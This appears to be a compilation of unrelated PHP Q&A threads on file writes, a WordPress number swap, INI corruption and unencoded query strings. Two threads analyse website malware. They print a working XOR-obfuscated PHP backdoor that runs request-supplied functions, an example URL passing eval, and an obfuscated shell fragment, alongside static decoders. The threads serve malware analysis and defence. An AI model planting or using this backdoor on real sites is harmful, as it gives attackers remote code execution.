I'm having this issue with the JSONAPI for minecraft. http://mcjsonapi.com/
I am trying to use the method "files.write" or "setFileContents" to replace the contents of a file. The website states this about the method.
Pretty simple. Just rewrites the file, right? Yeah, but this is proving to be more difficult than I thought. On my first attempt, I was trying to write 3450 characters to the file "groups.yml" on the Minecraft server. Here's the code I ran in PHP:
var_dump(
$api->call("files.write", array("plugins/GroupManager/worlds/world/groups.yml", (string)$yaml))
);
The var_dump is supposed to either return a success statement or an error describing what went wrong. But instead all I get is "null". This isn't right, and I know $yaml is being cast to a string, which isn't the issue. So I decided to start testing around. After much testing, I found that the character length of what I can set is exactly 1622. Adding another space or anything causes null; otherwise, it works. This is the modified file that is below 1622 characters I tested with.
So great, you found the issue, right? No, I didn't. I thought 1622 was an odd number to stop working, so I did some further testing. I tried to set 3000 characters I generated from just smashing my keyboard, and it worked! So what's going on here?
This and this works, but this doesn't. Why is this? This app called Adminium runs this exact API, and includes a file management system inside the app which I am assuming uses the same methods I am using, but it doesn't have a problem.
I have a forum post here that I also asked on, and still haven't gotten to an answer yet.
Hi, I found this code in my website files. Is this some kind of backdoor? Can someone explain this code line by line?
<? $_="{";
$_=($_^"<").($_^">").($_^"/");?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
Yes, this is malicious code.
Before spending any time looking at it, you should immediately take the site offline and replace it with a known-good copy, e.g. a backup or the official release. You should also make sure everything on your server is up to date and change your admin passwords. The fact that this code is there means your code was already compromised.
To confirm I'm not being over-dramatic, here's how the code works:
The first two lines generate a string containing the letters 'GET' by using bitwise XOR operations.
The third line then adds an '_' at the beginning, and executes $_GET["_"]($_GET["__"]);, echoing the result with <?=
This allows the attacker to access the page with a query string where _ is a function name and __ is its argument; PHP will run the function and display the result.
This in turn allows them to run any code they like, because they can just go to `/yourcompromisedpage.php?_=eval&__=anyPHPcodeatall();`
But to reiterate, the above is only to satisfy curiosity; this is a case where you should "shoot first, ask questions later". As soon as you've identified the code shouldn't be there, assume you've been compromised.
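The XOR decoding described in the answer above can be reproduced statically, without running the PHP. This is an added example, not part of the original answer; `analyse`, `php_xor` and the `BENIGN` sample are names and data made up for the illustration, and the regular expressions only cover the pattern shown in the question.

```python
import re

# The three lines quoted in the question above, embedded as sample input.
SAMPLE = r'''<? $_="{";
$_=($_^"<").($_^">").($_^"/");?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>'''

# Constructed benign file, to show the checks stay quiet on ordinary code.
BENIGN = '<?php $greeting="hi"; echo strtoupper($greeting); ?>'

SUPERGLOBALS = {"GET", "POST", "COOKIE", "REQUEST", "SERVER", "FILES"}

ASSIGN = re.compile(r'(\$\w+)\s*=\s*"([^"\\]*)"\s*;')           # $var = "literal";
XOR_TERM = re.compile(r'\(\s*(\$\w+)\s*\^\s*"([^"\\]*)"\s*\)')  # ($var ^ "literal")
DYNAMIC_CALL = re.compile(r'\$\{[^}]*\}\s*\[[^\]]*\]\s*\(')     # ${...}[...]( call


def php_xor(a, b):
    """PHP string ^ string: XOR byte by byte, up to the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def analyse(source):
    """Statically resolve XOR-built strings; no PHP is executed."""
    variables = dict(ASSIGN.findall(source))
    decoded = "".join(
        php_xor(variables[name], literal)
        for name, literal in XOR_TERM.findall(source)
        if name in variables
    )
    superglobal = "$_" + decoded if decoded in SUPERGLOBALS else None
    dynamic_call = bool(DYNAMIC_CALL.search(source))
    return {
        "decoded": decoded,
        "superglobal": superglobal,
        "dynamic_call": dynamic_call,
        # Request data used as a function name is the backdoor signature.
        "suspicious": superglobal is not None and dynamic_call,
    }


if __name__ == "__main__":
    print(analyse(SAMPLE))
    print(analyse(BENIGN))
```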
This is a strange one, but it seems like it should be really easy to solve.
I have a wordpress website Version 4.8.3. PHP 5.6.32.
Whenever I put a specific value into the title field, 6147989800 (or other fields), it gets swapped out on the front end with 8552226270.
I searched in every file on the server for some code (I suspect JavaScript) that is swapping out the numbers. No luck.
When I search the database, the original number 6147989800 is there. But when I do a var_dump of the field it shows 8552226270, and it shows up as 8552226270 on the front end.
This switch happens when I put in 6147989800, 614.798.9800, and 614-798-9800.
I'm at a loss. Even stranger is that when I duplicate the website to a local instance and on a test server the swap doesn't happen.
Any ideas would be great. Thanks!
Thank you John Ellmore for your help. It did end up being a third party Javascript that was doing the phone swap.
I don't know how I missed it [smacks palm against forehead]
I use flat files on my website to store account information for my game. But now, gem collecting doesn't work anymore. The filesize of the "accounts.ini" file is 218,750 bytes and the bottom of it looks like this:
[117157336030342728342]
GEMS = 7
[112725622837339591876]
GEMS = "1 4"4"
As you can see, the last line is wrong for some reason. What is causing this? Did I hit the filesize limit?
EDIT: Well, I should have tried it before, but I edited the last line to normal and it started working again. But you're right, I should use a database for such things. I've tried using a database before, but I didn't like it back then, but I guess that's not a good reason not to use it. I was just told that I won't be able to reach the "php.ini" file. I don't think I can find it either. Anyways, I'll switch to a database now, thanks for the advice!
Today I've found a malware on one site, I have deleted it, of course, and everything is ok, but in order to understand where it comes from, I would like to understand its logic, but it is encoded, in a quite easy way. At the beginning of the file I see:
$i96="QU~T<`_YM82iAN>/v#s\"'q#tZFjJX6a\tcI)yS^boD.\$du|3\rWw=rC!;[4*P5LVkB?%19m:p7 -zK,gOl{Efx]0R}&h+\n\\(enGH";
This is used then in all the rest of the file, as a dictionary of characters, from now on, there are all assignments like this:
$GLOBALS['rpdxi45'] = $i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[6].$i96[51].$i96[94].$i96[70].$i96[39].$i96[51].$i96[23].$i96[11].$i96[95].$i96[77];
Does anyone have a clue on how I can decode this (without infecting a server of mine, of course), or at least have the name of this type of encryption? Just to know if I can find something on the web.
If someone is interested, I can post the rest of the file, I found it odd.
Update: the file is actually a malicious shell hack. If you find it on your server, delete it and contact your sysadmin.
It is obfuscating the phrase "error_reporting"
<?php
$i96="QU~T<`_YM82iAN>/v#s\"'q#tZFjJX6a\tcI)yS^boD.\$du|3\rWw=rC!;[4*P5LVkB?%19m:p7 -zK,gOl{Efx]0R}&h+\n\\(enGH";
echo $i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[6].$i96[51].$i96[94].$i96[70].$i96[39].$i96[51].$i96[23].$i96[11].$i96[95].$i96[77];
$GLOBALS['rpdxi45'] is storing a string constructed from the characters of the string held in $i96.
Echoing $GLOBALS['rpdxi45'] will show you the string that has been constructed.
See here: http://ideone.com/Jy1uty
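The same lookup can be done without a PHP interpreter, which keeps the sample from ever executing. This is an added example, not code from the posts above; `decode` and `php_unescape` are illustrative names, the input is the two lines quoted in the question, and octal, hex and `\u{}` escapes in PHP strings are assumed absent and not handled.

```python
import re

# The dictionary and the assignment quoted in the question, as raw text.
SAMPLE = r'''$i96="QU~T<`_YM82iAN>/v#s\"'q#tZFjJX6a\tcI)yS^boD.\$du|3\rWw=rC!;[4*P5LVkB?%19m:p7 -zK,gOl{Efx]0R}&h+\n\\(enGH";
$GLOBALS['rpdxi45'] = $i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[6].$i96[51].$i96[94].$i96[70].$i96[39].$i96[51].$i96[23].$i96[11].$i96[95].$i96[77];'''

# Single-character escapes PHP recognises inside double-quoted strings.
PHP_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "v": "\v", "e": "\x1b",
               "f": "\f", "\\": "\\", "$": "$", '"': '"'}

STRING_ASSIGN = re.compile(r'(\$\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.S)
CHAIN_ASSIGN = re.compile(
    r"(\$\w+(?:\[[^\]]*\])?)\s*=\s*"                  # target, e.g. $GLOBALS['x']
    r"(\$\w+\[\d+\](?:\s*\.\s*\$\w+\[\d+\])*)\s*;"    # $t[1].$t[2]...
)
ITEM = re.compile(r"(\$\w+)\[(\d+)\]")


def php_unescape(body):
    """Turn the source text of a PHP double-quoted string into its value.
    Unknown escapes keep their backslash, as PHP does."""
    return re.sub(r"\\(.)",
                  lambda m: PHP_ESCAPES.get(m.group(1), m.group(0)),
                  body, flags=re.S)


def decode(source):
    """Map each obfuscated assignment target to the string it builds."""
    tables = {name: php_unescape(body)
              for name, body in STRING_ASSIGN.findall(source)}
    decoded = {}
    for target, chain in CHAIN_ASSIGN.findall(source):
        items = ITEM.findall(chain)
        # Skip chains that index an unknown table or run past its end.
        if all(n in tables and int(i) < len(tables[n]) for n, i in items):
            decoded[target] = "".join(tables[n][int(i)] for n, i in items)
    return decoded


if __name__ == "__main__":
    for target, value in decode(SAMPLE).items():
        print(target, "=>", repr(value))
```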
I'm really unsure if this is even possible but we have an issue where we control an interface that is having XML posted in to it via HTTP post in the form of www.url.com/script.php?xml=<xmlgoeshere>. That is then URL encoded and passed in to us, and we decode and parse it.
Except I have one client who just refuses to url encode their incoming code, which works fine except for when the XML hits an ampersand, at which point everything is being parsed as an end of the xml variable.
www.url.com/script.php?xml=<xmlstart...foo&bar.../>
The end result being that I have XML being POST/GET'd into the xml variable as normal, and then I lose half of the incoming content because of the ampersand.
Now I know that's expected/proper behavior, my question is, is it possible to capture the &bar.../> segment of this code, so that if we hit a known error I can crowbar this into working anyways? I know this is non-ideal but I'm at my wit's end dealing with the outside party.
UPDATE
Ok so I was totally confused. After grabbing the server variables as mentioned below, it looks like I'm not getting the querystring, but that's because on the query they're submitting it has:
[CONTENT_TYPE] => application/x-www-form-urlencoded
[QUERY_STRING] =>
That being the case, is the above behavior still to be expected? Is there a way to get the raw form input in this case? Thanks to the below posters for their help.
You'd be hard pressed to do it, if it's even possible, because the fragments of a query string take the format foo=bar with the & character acting as the separator. This means that you'd get an unpredictable $_GET variable created that would take the key name of everything between the & and the next = (assuming there even is one) that would take the value from the = to the next & or the end of the string.
It might be possible to attempt to parse the $_GET array in some way to recover the lost meaning but it would never be all that reliable. You might have more luck trying to parse $_SERVER['QUERY_STRING'], but that's not guaranteed to succeed either, and would be a hell of a lot of effort for a problem that can be avoided just by the client using the API properly.
And for me, that's the main point. If your client refuses to use your API in the way you tell them to use it, then it's ultimately their problem if it doesn't work, not yours. Of course you should accommodate your clients to a reasonable standard, but that doesn't mean bending over backwards for them just because they refuse to accommodate your needs or technical standards that have been laid down for the good of everyone.
If the only parameter you use is xml=, and it's always at the front, and there are no other parameters, you can do something like this pseudocode:
if (count($_GET)>1 or is_not_well_formed_xml($_GET['xml'])) {
    $xml = substr($_SERVER['QUERY_STRING'], 4);
    if (is_not_well_formed_xml($xml)) {
        really_fail();
    }
}
However, you should tell the client to fix their code, especially since it's so easy for them to comply with the standard! You might still get trouble if the xml contains a ? or a #, since PHP or the web server may get confused about where the query string starts (messing up your $_SERVER['QUERY_STRING']), and either PHP, the client's code or an intermediary proxy or web server may get confused about the #, because that usually is the beginning of a fragment.
E.g., Something like this might be impossible to transmit reliably in a query parameter:
<root><link href="http://example.org/?querystring#fragment"/></root>
So tell them to fix their code. It's almost certainly incredibly easy for them to do so!
UPDATE
There's some confusion about whether this is a GET or POST. If they send a POST with x-www-form-urlencoded body, you can substitute file_get_contents('php://input') for $_SERVER['QUERY_STRING'] in the code above.
Yes, it's possible, using $_SERVER["QUERY_STRING"].
For your url www.url.com/script.php?xml=<xmlstart...foo&bar.../>, $_SERVER["QUERY_STRING"] should contain, xml=<xmlstart...foo&bar.../>;
The following code should extract the xml data.
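// Search for the parameter name together with its "=", so that "xml" inside another value is not matched.
$pos = strpos($_SERVER["QUERY_STRING"], 'xml=');
$xml = "";
if ($pos !== false) {
    // Keep everything after "xml=", including any unencoded "&".
    $xml = substr($_SERVER["QUERY_STRING"], $pos + strlen("xml="));
}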
The problem here is that the query string will be parsed for & and = characters. If you know where your = character will be after the "bar" key then you may be able to capture the value of the rest of the string. However if you hit more & you are going to need to know the full content of the incoming message body. If you do then you should be able to get the rest of the content.